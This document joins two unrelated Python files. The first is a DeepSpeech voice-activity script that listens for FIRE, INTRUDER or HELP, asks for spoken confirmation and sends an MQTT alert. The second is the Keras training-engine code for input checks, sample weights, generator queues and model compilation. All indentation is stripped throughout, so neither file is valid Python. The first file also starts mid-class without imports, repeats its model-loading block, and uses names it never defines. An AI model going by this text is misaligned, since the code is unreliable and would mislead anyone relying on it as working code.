"""Streams raw audio from microphone. Data is received in a separate thread, and stored in a buffer, to be read from."""
FORMAT = pyaudio.paInt16
# Network/VAD rate-space
RATE_PROCESS = 16000
CHANNELS = 1
BLOCKS_PER_SECOND = 50
def __init__(self, callback=None, device=None, input_rate=RATE_PROCESS, file=None):
def proxy_callback(in_data, frame_count, time_info, status):
#pylint: disable=unused-argument
if self.chunk is not None:
in_data = self.wf.readframes(self.chunk)
callback(in_data)
return (None, pyaudio.paContinue)
if callback is None: callback = lambda in_data: self.buffer_queue.put(in_data)
self.buffer_queue = queue.Queue()
self.device = device
self.input_rate = input_rate
self.sample_rate = self.RATE_PROCESS
self.block_size = int(self.RATE_PROCESS / float(self.BLOCKS_PER_SECOND))
self.block_size_input = int(self.input_rate / float(self.BLOCKS_PER_SECOND))
self.pa = pyaudio.PyAudio()
kwargs = {
'format': self.FORMAT,
'channels': self.CHANNELS,
'rate': self.input_rate,
'input': True,
'frames_per_buffer': self.block_size_input,
'stream_callback': proxy_callback,
}
self.chunk = None
# if not default device
if self.device:
kwargs['input_device_index'] = self.device
elif file is not None:
self.chunk = 320
self.wf = wave.open(file, 'rb')
self.stream = self.pa.open(**kwargs)
self.stream.start_stream()
def resample(self, data, input_rate):
"""
Microphone may not support our native processing sampling rate, so
resample from input_rate to RATE_PROCESS here for webrtcvad and
deepspeech
Args:
data (binary): Input audio stream
input_rate (int): Input audio rate to resample from
"""
data16 = np.fromstring(string=data, dtype=np.int16)
resample_size = int(len(data16) / self.input_rate * self.RATE_PROCESS)
resample = signal.resample(data16, resample_size)
resample16 = np.array(resample, dtype=np.int16)
return resample16.tostring()
def read_resampled(self):
"""Return a block of audio data resampled to 16000hz, blocking if necessary."""
return self.resample(data=self.buffer_queue.get(),
input_rate=self.input_rate)
def read(self):
"""Return a block of audio data, blocking if necessary."""
return self.buffer_queue.get()
def destroy(self):
self.stream.stop_stream()
self.stream.close()
self.pa.terminate()
frame_duration_ms = property(lambda self: 1000 * self.block_size // self.sample_rate)
def write_wav(self, filename, data):
logging.info("write wav %s", filename)
wf = wave.open(filename, 'wb')
wf.setnchannels(self.CHANNELS)
# wf.setsampwidth(self.pa.get_sample_size(FORMAT))
assert self.FORMAT == pyaudio.paInt16
wf.setsampwidth(2)
wf.setframerate(self.sample_rate)
wf.writeframes(data)
wf.close()
class VADAudio(Audio):
"""Filter & segment audio with voice activity detection."""
def __init__(self, aggressiveness=3, device=None, input_rate=None, file=None):
super().__init__(device=device, input_rate=input_rate, file=file)
self.vad = webrtcvad.Vad(aggressiveness)
def frame_generator(self):
"""Generator that yields all audio frames from microphone."""
if self.input_rate == self.RATE_PROCESS:
while True:
yield self.read()
else:
while True:
yield self.read_resampled()
def vad_collector(self, padding_ms=300, ratio=0.75, frames=None):
"""Generator that yields series of consecutive audio frames comprising each utterence, separated by yielding a single None.
Determines voice activity by ratio of frames in padding_ms. Uses a buffer to include padding_ms prior to being triggered.
Example: (frame, ..., frame, None, frame, ..., frame, None, ...)
|---utterence---| |---utterence---|
"""
if frames is None: frames = self.frame_generator()
num_padding_frames = padding_ms // self.frame_duration_ms
ring_buffer = collections.deque(maxlen=num_padding_frames)
triggered = False
for frame in frames:
if len(frame) < 640:
return
is_speech = self.vad.is_speech(frame, self.sample_rate)
if not triggered:
ring_buffer.append((frame, is_speech))
num_voiced = len([f for f, speech in ring_buffer if speech])
if num_voiced > ratio * ring_buffer.maxlen:
triggered = True
for f, s in ring_buffer:
yield f
ring_buffer.clear()
else:
yield frame
ring_buffer.append((frame, is_speech))
num_unvoiced = len([f for f, speech in ring_buffer if not speech])
if num_unvoiced > ratio * ring_buffer.maxlen:
triggered = False
yield None
ring_buffer.clear()
def getModel(ARGS):
# Load DeepSpeech model
if os.path.isdir(ARGS.model):
model_dir = ARGS.model
ARGS.model = os.path.join(model_dir, 'output_graph.pb')
ARGS.scorer = os.path.join(model_dir, ARGS.scorer)
print('Initializing model...')
logging.info("ARGS.model: %s", ARGS.model)
model = deepspeech.Model(ARGS.model)
# Load DeepSpeech model
if os.path.isdir(ARGS.model):
model_dir = ARGS.model
ARGS.model = os.path.join(model_dir, 'output_graph.pb')
ARGS.scorer = os.path.join(model_dir, ARGS.scorer)
print('Initializing model...')
logging.info("ARGS.model: %s", ARGS.model)
model = deepspeech.Model(ARGS.model)
#model.addHotWord('Fire', 10)
#model.addHotWord('Intruder', 10)
#model.addHotWord('Help', 10)
#model.addHotWord('Yes', 10)
#model.addHotWord('No', 10)
if ARGS.scorer:
logging.info("ARGS.scorer: %s", ARGS.scorer)
model.enableExternalScorer(ARGS.scorer)
return model
is_confirmed = False
is_any_light_on = False
is_fire = False
is_help = False
is_intruder = False
start_time = time.time()
pixels = Pixels()
pixels.on()
def confirmation():
global is_confirmed
global is_any_light_on
is_confirmed = False
is_any_light_on = False
pixels.on()
print ('stopping confirmation wait {}: '.format(is_confirmed))
def main(ARGS):
# os.system("espeak -a {0} --stdout 'Starting the Service' | aplay -Dsysdefault".format(VOLUME))
pixels.on()
model = getModel(ARGS)
# Start audio with VAD
vad_audio = VADAudio(aggressiveness=ARGS.vad_aggressiveness,
device=ARGS.device,
input_rate=ARGS.rate,
file=ARGS.file)
print("Listening (ctrl-C to exit)...")
frames = vad_audio.vad_collector()
# Stream from microphone to DeepSpeech using VAD
spinner = None
if not ARGS.nospinner:
spinner = Halo(spinner='line')
stream_context = model.createStream()
wav_data = bytearray()
global is_confirmed
global is_any_light_on
global is_fire
global is_help
global is_intruder
global start_time
is_confirmed = False
is_any_light_on = False
is_fire = False
is_help = False
is_intruder = False
start_time = time.time()
hotword = ""
for frame in frames:
if not is_any_light_on:
pixels.on()
if frame is not None:
if spinner: spinner.start()
stream_context.feedAudioContent(np.frombuffer(frame, np.int16))
else:
if spinner: spinner.stop()
text = (stream_context.finishStream()).upper()
for p in phrases:
if p.upper() in text:
if time.time() - start_time > 2:
is_fire = False
is_help = False
is_intruder = False
if not is_confirmed and (p.upper() == 'FIRE' or p.upper() == 'INTRUDER' or p.upper() == 'HELP'):
checkword = True
if text.count(p.upper()) > 1 or is_fire or is_help or is_intruder:
pixels.detected()
is_any_light_on = True
os.system(confirmation_message.format(VOLUME, p))
t = threading.Timer(5, confirmation)
t.start()
is_confirmed = True
hotword = p
is_fire = False
is_help = False
is_intruder = False
checkword = False
if checkword:
start_time = time.time()
if not is_fire and p.upper() == 'FIRE':
is_fire = True
if not is_intruder and p.upper() == 'INTRUDER':
is_intruder = True
if not is_help and p.upper() == 'HELP':
is_help = True
elif is_confirmed and (p.upper() == 'YES'): # and time.time() < (start + 5):
# send message
is_confirmed = False
t.cancel()
pixels.confirmed()
is_any_light_on = True
if check_internet(REMOTE_SERVER):
os.system("espeak -a {0} --stdout 'Sending Trigger' | aplay -Dsysdefault".format(VOLUME))
print ("Recognized, {}".format(p))
now = datetime.now().isoformat()
logger.info('Sending trigger...')
send_mqtt_trigger(now, hotword, True)
pixels.on()
is_any_light_on = False
else:
os.system("espeak -a {0} --stdout 'No internet connection' | aplay".format(VOLUME))
print("No internet connection, MQTT trigger not sent")
logger.error("No internet connection, MQTT trigger not sent")
pixels.ota()
is_any_light_on = True
is_confirmed = False
elif is_confirmed and (p.upper() == 'NO'): # and time.time() < (start + 5):
print ("Recognized, {}".format(p))
is_confirmed = False
t.cancel()
pixels.confirmed()
is_any_light_on = True
if check_internet(REMOTE_SERVER):
now = datetime.now().isoformat()
print ("Recognized, {}".format(p))
logger.info('Sending trigger...')
send_mqtt_trigger(now, hotword, False)
pixels.on()
is_any_light_on = False
else:
os.system("espeak -a {0} --stdout 'No internet connection' | aplay".format(VOLUME))
print("No internet connection, MQTT trigger not sent")
logger.error("No internet connection, MQTT trigger not sent")
pixels.ota()
is_any_light_on = True
pixels.on()
is_any_light_on = False
else:
print ("Recognized, {}".format(p))
stream_context = model.createStream()
if __name__ == '__main__':
DEFAULT_SAMPLE_RATE = 16000
import argparse
parser = argparse.ArgumentParser(description="Stream from microphone to DeepSpeech using VAD")
parser.add_argument('-v', '--vad_aggressiveness', type=int, default=3,
help="Set aggressiveness of VAD: an integer between 0 and 3, 0 being the least aggressive about filtering out non-speech, 3 the most aggressive. Default: 3")
parser.add_argument('--nospinner', action='store_true',
help="Disable spinner")
parser.add_argument('-w', '--savewav',
help="Save .wav files of utterences to given directory")
parser.add_argument('-f', '--file',
help="Read from .wav file instead of microphone")
parser.add_argument('-m', '--model', required=True,
help="Path to the model (protocol buffer binary file, or entire directory containing all standard-named files for model)")
parser.add_argument('-s', '--scorer',
help="Path to the external scorer file.")
parser.add_argument('-d', '--device', type=int, default=None,
help="Device input index (Int) as listed by pyaudio.PyAudio.get_device_info_by_index(). If not provided, falls back to PyAudio.get_default_device().")
parser.add_argument('-r', '--rate', type=int, default=DEFAULT_SAMPLE_RATE,
help=f"Input device sample rate. Default: {DEFAULT_SAMPLE_RATE}. Your device may require 44100.")
ARGS = parser.parse_args()
if ARGS.savewav: os.makedirs(ARGS.savewav, exist_ok=True)
thread = Thread(target=check_button_press)
thread.start()
main(ARGS)
|
training.py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import absolute_import
import warnings
import copy
import time
import numpy as np
import multiprocessing
import threading
import six
try:
import queue
except ImportError:
import Queue as queue
from .topology import Container
from .. import backend as K
from .. import optimizers
from .. import losses
from .. import metrics as metrics_module
from ..utils.generic_utils import Progbar
from .. import callbacks as cbks
from ..legacy import interfaces
def _standardize_input_data(data, names, shapes=None,
check_batch_axis=True,
exception_prefix=''):
"""Normalizes inputs and targets provided by users.
Users may pass data as a list of arrays, dictionary of arrays,
or as a single array. We normalize this to an ordered list of
arrays (same order as `names`), while checking that the provided
arrays have shapes that match the network's expectations.
# Arguments
data: User-provided input data (polymorphic).
names: List of expected array names.
shapes: Optional list of expected array shapes.
check_batch_axis: Boolean; whether to check that
the batch axis of the arrays matches the expected
value found in `shapes`.
exception_prefix: String prefix used for exception formatting.
# Returns
List of standardized input arrays (one array per model input).
# Raises
ValueError: in case of improperly formatted user-provided data.
"""
if not names:
return []
if data is None:
return [None for _ in range(len(names))]
if isinstance(data, dict):
arrays = []
for name in names:
if name not in data:
raise ValueError('No data provided for "' +
name + '". Need data for each key in: ' +
str(names))
arrays.append(data[name])
elif isinstance(data, list):
if len(data) != len(names):
if data and hasattr(data[0], 'shape'):
raise ValueError('Error when checking model ' +
exception_prefix +
': the list of Numpy arrays '
'that you are passing to your model '
'is not the size the model expected. '
'Expected to see ' + str(len(names)) +
' arrays but instead got '
'the following list of ' + str(len(data)) +
' arrays: ' + str(data)[:200] +
'...')
else:
if len(names) == 1:
data = [np.asarray(data)]
else:
raise ValueError(
'Error when checking model ' +
exception_prefix +
': you are passing a list as '
'input to your model, '
'but the model expects '
'a list of ' + str(len(names)) +
' Numpy arrays instead. '
'The list you passed was: ' +
str(data)[:200])
arrays = data
else:
if not hasattr(data, 'shape'):
raise TypeError('Error when checking model ' +
exception_prefix +
': data should be a Numpy array, '
'or list/dict of Numpy arrays. '
'Found: ' + str(data)[:200] + '...')
if len(names) > 1:
# Case: model expects multiple inputs but only received
# a single Numpy array.
raise ValueError('The model expects ' + str(len(names)) +
exception_prefix +
' arrays, but only received one array. '
'Found: array with shape ' + str(data.shape))
arrays = [data]
# Make arrays at least 2D.
for i in range(len(names)):
array = arrays[i]
if len(array.shape) == 1:
array = np.expand_dims(array, 1)
arrays[i] = array
# Check shapes compatibility.
if shapes:
for i in range(len(names)):
if shapes[i] is None:
continue
array = arrays[i]
if len(array.shape) != len(shapes[i]):
raise ValueError('Error when checking ' + exception_prefix +
': expected ' + names[i] +
' to have ' + str(len(shapes[i])) +
' dimensions, but got array with shape ' +
str(array.shape))
for j, (dim, ref_dim) in enumerate(zip(array.shape, shapes[i])):
if not j and not check_batch_axis:
# skip the first axis
continue
if ref_dim:
if ref_dim != dim:
raise ValueError(
'Error when checking ' + exception_prefix +
': expected ' + names[i] +
' to have shape ' + str(shapes[i]) +
' but got array with shape ' +
str(array.shape))
return arrays
def _standardize_sample_or_class_weights(x_weight, output_names, weight_type):
"""Maps `sample_weight` or `class_weight` to model outputs.
# Arguments
x_weight: User-provided `sample_weight` or `class_weight` argument.
output_names: List of output names (strings) in the model.
weight_type: A string used purely for exception printing.
# Returns
A list of `sample_weight` or `class_weight` where there are exactly
one element per model output.
# Raises
ValueError: In case of invalid user-provided argument.
"""
if x_weight is None or len(x_weight) == 0:
return [None for _ in output_names]
if len(output_names) == 1:
if isinstance(x_weight, list) and len(x_weight) == 1:
return x_weight
if isinstance(x_weight, dict) and output_names[0] in x_weight:
return [x_weight[output_names[0]]]
else:
return [x_weight]
if isinstance(x_weight, list):
if len(x_weight) != len(output_names):
raise ValueError('Provided `' + weight_type + '` was a list of ' +
str(len(x_weight)) +
' elements, but the model has ' +
str(len(output_names)) + ' outputs. '
'You should provide one `' + weight_type + '`'
'array per model output.')
return x_weight
if isinstance(x_weight, dict):
x_weights = []
for name in output_names:
x_weights.append(x_weight.get(name))
return x_weights
else:
raise TypeError('The model has multiple outputs, so `' +
weight_type + '` '
'should be either a list of a dict. '
'Provided `' + weight_type +
'` type not understood: ' +
str(x_weight))
def _standardize_class_weights(class_weight, output_names):
return _standardize_sample_or_class_weights(class_weight,
output_names,
'class_weight')
def _standardize_sample_weights(sample_weight, output_names):
return _standardize_sample_or_class_weights(sample_weight,
output_names,
'sample_weight')
def _check_array_lengths(inputs, targets, weights):
"""Does user input validation for numpy arrays.
# Arguments
inputs: list of Numpy arrays of inputs.
targets: list of Numpy arrays of targets.
weights: list of Numpy arrays of sample weights.
# Raises
ValueError: in case of incorrectly formatted data.
"""
x_lengths = [x.shape[0] for x in inputs]
y_lengths = [y.shape[0] for y in targets]
w_lengths = [w.shape[0] for w in weights]
set_x = set(x_lengths)
if len(set_x) > 1:
raise ValueError('All input arrays (x) should have '
'the same number of samples. Got array shapes: ' +
str([x.shape for x in inputs]))
set_y = set(y_lengths)
if len(set_y) > 1:
raise ValueError('All target arrays (y) should have '
'the same number of samples. Got array shapes: ' +
str([y.shape for y in targets]))
set_w = set(w_lengths)
if len(set_w) > 1:
raise ValueError('All sample_weight arrays should have '
'the same number of samples. Got array shapes: ' +
str([w.shape for w in weights]))
if set_x and set_y and list(set_x)[0] != list(set_y)[0]:
raise ValueError('Input arrays should have '
'the same number of samples as target arrays. '
'Found ' + str(list(set_x)[0]) + ' input samples '
'and ' + str(list(set_y)[0]) + ' target samples.')
if set_y and set_w and list(set_y)[0] != list(set_w)[0]:
raise ValueError('Sample_weight arrays should have '
'the same number of samples as target arrays. Got ' +
str(list(set_y)[0]) + ' input samples and ' +
str(list(set_w)[0]) + ' target samples.')
def _check_loss_and_target_compatibility(targets, loss_fns, output_shapes):
"""Does validation on the compatiblity of targets and loss functions.
This helps prevent users from using loss functions incorrectly.
# Arguments
targets: list of Numpy arrays of targets.
loss_fns: list of loss functions.
output_shapes: list of shapes of model outputs.
# Raises
ValueError: if a loss function or target array
is incompatible with an output.
"""
key_losses = {'mean_square_error',
'binary_crossentropy',
'categorical_crossentropy'}
for y, loss, shape in zip(targets, loss_fns, output_shapes):
if loss is None:
continue
if loss.__name__ == 'categorical_crossentropy':
if y.shape[-1] == 1:
raise ValueError(
'You are passing a target array of shape ' + str(y.shape) +
' while using as loss `categorical_crossentropy`. '
'`categorical_crossentropy` expects '
'targets to be binary matrices (1s and 0s) '
'of shape (samples, classes). '
'If your targets are integer classes, '
'you can convert them to the expected format via:\n'
'```\n'
'from keras.utils.np_utils import to_categorical\n'
'y_binary = to_categorical(y_int)\n'
'```\n'
'\n'
'Alternatively, you can use the loss function '
'`sparse_categorical_crossentropy` instead, '
'which does expect integer targets.')
if loss.__name__ in key_losses:
for target_dim, out_dim in zip(y.shape[1:], shape[1:]):
if out_dim is not None and target_dim != out_dim:
raise ValueError(
'A target array with shape ' + str(y.shape) +
' was passed for an output of shape ' + str(shape) +
' while using as loss `' + loss.__name__ + '`. '
'This loss expects '
'targets to have the same shape '
'as the output.')
def _collect_metrics(metrics, output_names):
"""Maps metric functions to model outputs.
# Arguments
metrics: a list or dict of metric functions.
output_names: a list of the names (strings) of model outputs.
# Returns
A list (one entry per model output) of lists of metric functions.
For instance, if the model has 2 outputs, and for the first output
we want to compute "binary_accuracy" and "binary_crossentropy",
and just "binary_accuracy" for the second output,
the list would look like:
`[[binary_accuracy, binary_crossentropy], [binary_accuracy]]`
# Raises
TypeError: if an incorrect type is passed for the `metrics` argument.
"""
if not metrics:
return [[] for _ in output_names]
if isinstance(metrics, list):
# we then apply all metrics to all outputs.
return [copy.copy(metrics) for _ in output_names]
elif isinstance(metrics, dict):
nested_metrics = []
for name in output_names:
output_metrics = metrics.get(name, [])
if not isinstance(output_metrics, list):
output_metrics = [output_metrics]
nested_metrics.append(output_metrics)
return nested_metrics
else:
raise TypeError('Type of `metrics` argument not understood. '
'Expected a list or dictionary, found: ' +
str(metrics))
def _batch_shuffle(index_array, batch_size):
"""Shuffles an array in a batch-wise fashion.
Useful for shuffling HDF5 arrays
(where one cannot access arbitrary indices).
# Arguments
index_array: array of indices to be shuffled.
batch_size: integer.
# Returns
The `index_array` array, shuffled in a batch-wise fashion.
"""
batch_count = int(len(index_array) / batch_size)
# to reshape we need to be cleanly divisible by batch size
# we stash extra items and reappend them after shuffling
last_batch = index_array[batch_count * batch_size:]
index_array = index_array[:batch_count * batch_size]
index_array = index_array.reshape((batch_count, batch_size))
np.random.shuffle(index_array)
index_array = index_array.flatten()
return np.append(index_array, last_batch)
def _make_batches(size, batch_size):
"""Returns a list of batch indices (tuples of indices).
# Arguments
size: Integer, total size of the data to slice into batches.
batch_size: Integer, batch size.
# Returns
A list of tuples of array indices.
"""
num_batches = int(np.ceil(size / float(batch_size)))
return [(i * batch_size, min(size, (i + 1) * batch_size))
for i in range(0, num_batches)]
def _slice_arrays(arrays, start=None, stop=None):
"""Slice an array or list of arrays.
This takes an array-like, or a list of
array-likes, and outputs:
- arrays[start:stop] if `arrays` is an array-like
- [x[start:stop] for x in arrays] if `arrays` is a list
Can also work on list/array of indices: `_slice_arrays(x, indices)`
# Arguments
arrays: Single array or list of arrays.
start: can be an integer index (start index)
or a list/array of indices
stop: integer (stop index); should be None if
`start` was a list.
# Returns
A slice of the array(s).
"""
if isinstance(arrays, list):
if hasattr(start, '__len__'):
# hdf5 datasets only support list objects as indices
if hasattr(start, 'shape'):
start = start.tolist()
return [x[start] for x in arrays]
else:
return [x[start:stop] for x in arrays]
else:
if hasattr(start, '__len__'):
if hasattr(start, 'shape'):
start = start.tolist()
return arrays[start]
else:
return arrays[start:stop]
def _weighted_masked_objective(fn):
"""Adds support for masking and sample-weighting to an objective function.
It transforms an objective function `fn(y_true, y_pred)`
into a sample-weighted, cost-masked objective function
`fn(y_true, y_pred, weights, mask)`.
# Arguments
fn: The objective function to wrap,
with signature `fn(y_true, y_pred)`.
# Returns
A function with signature `fn(y_true, y_pred, weights, mask)`.
"""
if fn is None:
return None
def weighted(y_true, y_pred, weights, mask=None):
"""Wrapper function.
# Arguments
y_true: `y_true` argument of `fn`.
y_pred: `y_pred` argument of `fn`.
weights: Weights tensor.
mask: Mask tensor.
# Returns
Scalar tensor.
"""
# score_array has ndim >= 2
score_array = fn(y_true, y_pred)
if mask is not None:
# Cast the mask to floatX to avoid float64 upcasting in theano
mask = K.cast(mask, K.floatx())
# mask should have the same shape as score_array
score_array *= mask
# the loss per batch should be proportional
# to the number of unmasked samples.
score_array /= K.mean(mask)
# reduce score_array to same ndim as weight array
ndim = K.ndim(score_array)
weight_ndim = K.ndim(weights)
score_array = K.mean(score_array, axis=list(range(weight_ndim, ndim)))
# apply sample weighting
if weights is not None:
score_array *= weights
score_array /= K.mean(K.cast(K.not_equal(weights, 0), K.floatx()))
return K.mean(score_array)
return weighted
def _masked_objective(fn):
"""Adds support for masking to an objective function.
It transforms an objective function `fn(y_true, y_pred)`
into a cost-masked objective function
`fn(y_true, y_pred, mask)`.
# Arguments
fn: The objective function to wrap,
with signature `fn(y_true, y_pred)`.
# Returns
A function with signature `fn(y_true, y_pred, mask)`.
"""
def masked(y_true, y_pred, mask=None):
"""Wrapper function.
# Arguments
y_true: `y_true` argument of `fn`.
y_pred: `y_pred` argument of `fn`.
mask: Mask tensor.
# Returns
Scalar tensor.
"""
# score_array has ndim >= 2
score_array = fn(y_true, y_pred)
if mask is not None:
# Cast the mask to floatX to avoid float64 upcasting in theano
mask = K.cast(mask, K.floatx())
# mask should have the same shape as score_array
score_array *= mask
# the loss per batch should be proportional
# to the number of unmasked samples.
score_array /= K.mean(mask)
return K.mean(score_array)
return masked
def _standardize_weights(y, sample_weight=None, class_weight=None,
sample_weight_mode=None):
"""Performs sample weight validation and standardization.
Everything gets normalized to a single sample-wise (or timestep-wise)
weight array.
# Arguments
y: Numpy array of model targets to be weighted.
sample_weight: User-provided `sample_weight` argument.
class_weight: User-provided `class_weight` argument.
sample_weight_mode: One of `None` or `"temporal"`.
`"temporal"` indicated that we expect 2D weight data
that will be applied to the last 2 dimensions of
the targets (i.e. we are weighting timesteps, not samples).
# Returns
A numpy array of target weights, one entry per sample to weight.
# Raises
ValueError: In case of invalid user-provided arguments.
"""
if sample_weight_mode is not None:
if sample_weight_mode != 'temporal':
raise ValueError('"sample_weight_mode '
'should be None or "temporal". '
'Found: ' + str(sample_weight_mode))
if len(y.shape) < 3:
raise ValueError('Found a sample_weight array for '
'an input with shape ' +
str(y.shape) + '. '
'Timestep-wise sample weighting (use of '
'sample_weight_mode="temporal") is restricted to '
'outputs that are at least 3D, i.e. that have '
'a time dimension.')
if sample_weight is not None and len(sample_weight.shape) != 2:
raise ValueError('Found a sample_weight array with shape ' +
str(sample_weight.shape) + '. '
'In order to use timestep-wise sample weighting, '
'you should pass a 2D sample_weight array.')
else:
if sample_weight is not None and len(sample_weight.shape) != 1:
raise ValueError('Found a sample_weight array with shape ' +
str(sample_weight.shape) + '. '
'In order to use timestep-wise sample weights, '
'you should specify '
'sample_weight_mode="temporal" '
'in compile(). If you just mean to use '
'sample-wise weights, make sure your '
'sample_weight array is 1D.')
if sample_weight is not None:
if len(sample_weight.shape) > len(y.shape):
raise ValueError('Found a sample_weight with shape' +
str(sample_weight.shape) + '.'
'Expected sample_weight with rank '
'less than or equal to ' + str(len(y.shape)))
if y.shape[:sample_weight.ndim] != sample_weight.shape:
raise ValueError('Found a sample_weight array with shape ' +
str(sample_weight.shape) + ' for an input with shape ' +
str(y.shape) + '. '
'sample_weight cannot be broadcast.')
return sample_weight
elif isinstance(class_weight, dict):
if len(y.shape) > 2:
raise ValueError('class_weight not supported for '
'3+ dimensional targets.')
if y.shape[1] > 1:
y_classes = y.argmax(axis=1)
elif y.shape[1] == 1:
y_classes = np.reshape(y, y.shape[0])
else:
y_classes = y
weights = np.asarray([class_weight[cls] for cls in y_classes])
return weights
else:
if sample_weight_mode is None:
return np.ones((y.shape[0],), dtype=K.floatx())
else:
return np.ones((y.shape[0], y.shape[1]), dtype=K.floatx())
class GeneratorEnqueuer(object):
"""Builds a queue out of a data generator.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
generator: a generator function which endlessly yields data
pickle_safe: use multiprocessing if True, otherwise threading
"""
def __init__(self, generator, pickle_safe=False):
self._generator = generator
self._pickle_safe = pickle_safe
self._threads = []
self._stop_event = None
self.queue = None
def start(self, workers=1, max_q_size=10, wait_time=0.05):
"""Kicks off threads which add data from the generator into the queue.
# Arguments
workers: number of worker threads
max_q_size: queue size (when full, threads could block on put())
wait_time: time to sleep in-between calls to put()
"""
def data_generator_task():
while not self._stop_event.is_set():
try:
if self._pickle_safe or self.queue.qsize() < max_q_size:
generator_output = next(self._generator)
self.queue.put(generator_output)
else:
time.sleep(wait_time)
except Exception:
self._stop_event.set()
raise
try:
if self._pickle_safe:
self.queue = multiprocessing.Queue(maxsize=max_q_size)
self._stop_event = multiprocessing.Event()
else:
self.queue = queue.Queue()
self._stop_event = threading.Event()
for _ in range(workers):
if self._pickle_safe:
# Reset random seed else all children processes
# share the same seed
np.random.seed()
thread = multiprocessing.Process(target=data_generator_task)
thread.daemon = True
else:
thread = threading.Thread(target=data_generator_task)
self._threads.append(thread)
thread.start()
except:
self.stop()
raise
def is_running(self):
return self._stop_event is not None and not self._stop_event.is_set()
def stop(self, timeout=None):
"""Stop running threads and wait for them to exit, if necessary.
Should be called by the same thread which called start().
# Arguments
timeout: maximum time to wait on thread.join()
"""
if self.is_running():
self._stop_event.set()
for thread in self._threads:
if thread.is_alive():
if self._pickle_safe:
thread.terminate()
else:
thread.join(timeout)
if self._pickle_safe:
if self.queue is not None:
self.queue.close()
self._threads = []
self._stop_event = None
self.queue = None
class Model(Container):
"""The `Model` class adds training & evaluation routines to a `Container`.
"""
def compile(self, optimizer, loss, metrics=None, loss_weights=None,
sample_weight_mode=None, **kwargs):
"""Configures the model for training.
# Arguments
optimizer: str (name of optimizer) or optimizer object.
See [optimizers](/optimizers).
loss: str (name of objective function) or objective function.
See [losses](/losses).
If the model has multiple outputs, you can use a different loss
on each output by passing a dictionary or a list of losses.
The loss value that will be minimized by the model
will then be the sum of all individual losses.
metrics: list of metrics to be evaluated by the model
during training and testing.
Typically you will use `metrics=['accuracy']`.
To specify different metrics for different outputs of a
multi-output model, you could also pass a dictionary,
such as `metrics={'output_a': 'accuracy'}`.
loss_weights: Optional list or dictionary specifying scalar
coefficients (Python floats) to weight the loss contributions
of different model outputs.
The loss value that will be minimized by the model
will then be the *weighted sum* of all individual losses,
weighted by the `loss_weights` coefficients.
If a list, it is expected to have a 1:1 mapping
to the model's outputs. If a tensor, it is expected to map
output names (strings) to scalar coefficients.
sample_weight_mode: if you need to do timestep-wise
sample weighting (2D weights), set this to `"temporal"`.
`None` defaults to sample-wise weights (1D).
If the model has multiple outputs, you can use a different
`sample_weight_mode` on each output by passing a
dictionary or a list of modes.
**kwargs: when using the Theano backend, these arguments
are passed into K.function. Ignored for Tensorflow backend.
# Raises
ValueError: In case of invalid arguments for
`optimizer`, `loss`, `metrics` or `sample_weight_mode`.
"""
loss = loss or {}
self.optimizer = optimizers.get(optimizer)
self.sample_weight_mode = sample_weight_mode
self.loss = loss
self.loss_weights = loss_weights
# Prepare loss functions.
if isinstance(loss, dict):
for name in loss:
if name not in self.output_names:
raise ValueError('Unknown entry in loss '
'dictionary: "' + name + '". '
'Only expected the following keys: ' +
str(self.output_names))
loss_functions = []
for name in self.output_names:
if name not in loss:
warnings.warn('Output "' + name +
'" missing from loss dictionary. '
'We assume this was done on purpose, '
'and we will not be expecting '
'any data to be passed to "' + name +
'" during training.', stacklevel=2)
loss_functions.append(losses.get(loss.get(name)))
elif isinstance(loss, list):
if len(loss) != len(self.outputs):
raise ValueError('When passing a list as loss, '
'it should have one entry per model outputs. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed loss=' +
str(loss))
loss_functions = [losses.get(l) for l in loss]
else:
loss_function = losses.get(loss)
loss_functions = [loss_function for _ in range(len(self.outputs))]
self.loss_functions = loss_functions
weighted_losses = [_weighted_masked_objective(fn) for fn in loss_functions]
skip_indices = []
self._feed_outputs = []
self._feed_output_names = []
self._feed_output_shapes = []
self._feed_loss_fns = []
for i in range(len(weighted_losses)):
if weighted_losses[i] is None:
skip_indices.append(i)
else:
self._feed_outputs.append(self.outputs[i])
self._feed_output_names.append(self.output_names[i])
self._feed_output_shapes.append(self.internal_output_shapes[i])
self._feed_loss_fns.append(self.loss_functions[i])
# Prepare output masks.
masks = self.compute_mask(self.inputs, mask=None)
if masks is None:
masks = [None for _ in self.outputs]
if not isinstance(masks, list):
masks = [masks]
# Prepare loss weights.
if loss_weights is None:
loss_weights_list = [1. for _ in range(len(self.outputs))]
elif isinstance(loss_weights, dict):
for name in loss_weights:
if name not in self.output_names:
raise ValueError('Unknown entry in loss_weights '
'dictionary: "' + name + '". '
'Only expected the following keys: ' +
str(self.output_names))
loss_weights_list = []
for name in self.output_names:
loss_weights_list.append(loss_weights.get(name, 1.))
elif isinstance(loss_weights, list):
if len(loss_weights) != len(self.outputs):
raise ValueError('When passing a list as loss_weights, '
'it should have one entry per model outputs. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed loss_weights=' +
str(loss_weights))
loss_weights_list = loss_weights
else:
raise TypeError('Could not interpret loss_weights argument: ' +
str(loss_weights) +
' - expected a list of dicts.')
# Prepare sample weights.
sample_weights = []
sample_weight_modes = []
if isinstance(sample_weight_mode, dict):
for name in sample_weight_mode:
if name not in self.output_names:
raise ValueError('Unknown entry in '
'sample_weight_mode dictionary: "' +
name + '". '
'Only expected the following keys: ' +
str(self.output_names))
for i, name in enumerate(self.output_names):
if i in skip_indices:
weight = None
sample_weight_modes.append(None)
else:
if name not in sample_weight_mode:
raise ValueError('Output "' + name +
'" missing from sample_weight_modes '
'dictionary')
if sample_weight_mode.get(name) == 'temporal':
weight = K.placeholder(ndim=2,
name=name + '_sample_weights')
sample_weight_modes.append('temporal')
else:
weight = K.placeholder(ndim=1,
name=name + '_sample_weights')
sample_weight_modes.append(None)
sample_weights.append(weight)
elif isinstance(sample_weight_mode, list):
if len(sample_weight_mode) != len(self.outputs):
raise ValueError('When passing a list as sample_weight_mode, '
'it should have one entry per model outputs. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed '
'sample_weight_mode=' +
str(sample_weight_mode))
for i in range(len(self.output_names)):
if i in skip_indices:
weight = None
sample_weight_modes.append(None)
else:
mode = sample_weight_mode[i]
name = self.output_names[i]
if mode == 'temporal':
weight = K.placeholder(ndim=2,
name=name + '_sample_weights')
sample_weight_modes.append('temporal')
else:
weight = K.placeholder(ndim=1,
name=name + '_sample_weights')
sample_weight_modes.append(None)
